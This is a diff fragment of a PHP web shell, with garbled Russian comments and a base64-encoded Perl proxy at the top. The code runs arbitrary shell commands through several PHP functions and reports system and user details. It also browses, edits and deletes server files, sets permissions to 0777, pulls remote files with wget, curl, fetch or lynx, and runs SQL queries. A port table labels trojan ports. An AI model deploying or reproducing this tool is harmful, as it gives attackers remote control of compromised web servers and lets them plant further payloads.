+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîğåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïğåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêğûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>&nbsp;&nbsp;&nbsp;".$fil."&nbsp;&nbsp;&nbsp;</b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "</textarea></td></tr>";
+ if(is_writable($fil)){
+  echo "<input type=\"hidden\" value='".$fil."' name=\"fname\">";
+  echo "<input type=\"hidden\" value='".$d."' name=\"dname\">";
+  echo "<tr><td alling=center><input style='width:100px;' type=\"submit\" value=\"Save\" name=\"b_save\"></td></tr>";
+ }
+ echo "</form></table>";
+}
+function save_file($res,$fil, $d)                     //Ñîõğàíèòü ôàéë
+{
+ unlink($fil);
+ $fp=fopen($fil,"wb");
+ if(!$fp){
+  $res="Error create file!\n".$fp;
+ }else{
+  if (fwrite($fp,$res)){
+   if (fclose($fp)){
+    $res="File save succesfuly!\n";
+   }else $res="Erorr close!\n";
+  }else $res="Error wright!\n";
+ }
+ umask(0000);
+ chmod($fil,0777);
+ return $res;
+}
+function strmass($mass){
+ $res="";
+ foreach($mass as $k=>$v){
+  $res.=$v."|";
+ }
+ return $res;
+}
+function sortbyname($fnames, $d)
+{
+ $filenames="";
+ $foldernames="";
+ $numnames=count($fnames);
+ for($i=0;$i<=$numnames;$i++){
+  if(is_dir($d."/".$fnames[$i])){
+   $foldernames.=$fnames[$i]."|";
+  }else
+   $filenames.=$fnames[$i]."|";
+ }
+ $mass1=explode("|",$foldernames);
+ $mass2=explode("|",$filenames);
+ sort($mass1);
+ sort($mass2);
+ $mass1=strmass($mass1);
+ $mass2=strmass($mass2);
+ $mass=explode("|",$mass1.$mass2);
+ return $mass;
+}
+function list_dir($d)                     //Íàâèãàöèÿ
+{
+ global $HTTP_REFERER;
+ if(isset($_POST['b_up']) OR isset($_POST['b_open_dir'])){
+  chdir($_POST['fname']);
+  $d=getcwd();
+ }else
+  $d=getcwd();
+ if($_POST['b_new_dir']){
+  mkdir($_POST['new']);
+  chmod($_POST['new'],0777);
+  $d=$_POST['new'];
+ }
+ if($_POST['b_del'] AND is_dir($_POST['fname'])){
+  rmdir($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_del'] AND !is_dir($_POST['fname'])){
+  unlink($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_change_dir']){
+  chdir($_POST['change_dir']);
+  $d=getcwd();
+ }
+ if($_POST['b_new_file'] OR $_POST['b_open_file']){
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ $dir=read_dir($d);
+ $dir=sortbyname($dir,$d);
+ $count=count($dir);
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b>Navigation</b></td></tr>";
+ if(is_writable($d)){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"new\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewDir\" name=\"b_new_dir\"></td>";
+  echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewFile\" name=\"b_new_file\"></td></tr>";
+ }
+ echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"change_dir\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"ChangeDir\" name=\"b_change_dir\"></td></tr>";
+ if(!$safe_mode){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"\" name=\"ffile\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"FindeFile\" name=\"b_f_file\"></td></tr>";
+ }
+ echo "</table></form>";
+ echo "<table CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+ echo "<tr bgcolor=#ffff00><td><b>&nbsp;&nbsp;&nbsp;Directory&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Permission&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Size&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Owner/Group&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Action&nbsp;&nbsp;&nbsp;</b></td>";
+ for($i=0; $i<$count; $i++){
+  if($dir[$i]!=""){
+   $full=$d."/".$dir[$i];
+   $perm=permissions(fileperms($full),$dir[$i]);
+   $file=$d."/".$dir[$i];
+   echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+   if(is_dir($file)){
+    echo "<tr bgcolor=#98FA00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+          "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }elseif(is_file($file)){
+    echo "<tr><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }else
+     echo "<tr bgcolor=#ffff00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   if(is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Listing\" name=\"b_open_dir\"></td>";
+   }elseif(is_readable($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Open\" name=\"b_open_file\"></td>";
+   }
+   if(is_writable($file) AND $file!=".."){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Delete\" name=\"b_del\"></td>";
+   }
+   if(is_readable($file) AND !is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Download\" name=\"b_down\"></td>";
+   }
+   echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\"></tr>";
+   echo "</form>";
+  }
+ }
+ echo "</table>";
+ closedir($d);
+}
+function up_file($fil,$tfil, $box)                   //Çàãğóçêà ôàéëîâ íà ñåğâåğ
+{
+ global $_FILES;
+ if ($tfil==""){
+  $res="Target is failde!";
+ }
+ if ($box=="PC"){
+  if(copy($_FILES["filename"]["tmp_name"],$tfil)){
+   chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  }else {
+    $res="Error loading file!";
+  }
+ }
+ if($box=="WGET") {
+  $load="wget ".$fil." -O ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="FETCH"){
+  $load="fetch -o ".$tfil." -p ".$fil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="LYNX"){
+  $load="lynx -source ".$fil." > ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="cURL"){
+  $load="curl"." ".$fil." -o ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="fopen"){
+  $data=implode("", file($fil));
+  $fp=fopen($tfil, "wb");
+  fputs($fp,$data);
+  fclose($fp);
+  chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+ }
+ return $res;
+}
+function run_sql($comd, $db,$host, $username, $pass)   //Ğåçóëüòàò SQL çàïğîñà
+{
+ if ($comd!=""){
+  if ($db!=""){
+   $connect=mysql_connect($host, $username, $pass);
+   if (!$connect) {
+    $res='Could not connect to MySQL';
+   }
+   mysql_select_db ($db);
+   $row=mysql_query($comd);
+   while ($r= mysql_fetch_row($row)) {
+    $res.="&nbsp;".implode($r);
+   }
+   $result=$res;
+   mysql_free_result($row);
+   mysql_free_result($r);
+   mysql_close($connect);
+  }else $result="Select data base!";
+ }else $result="No command!";
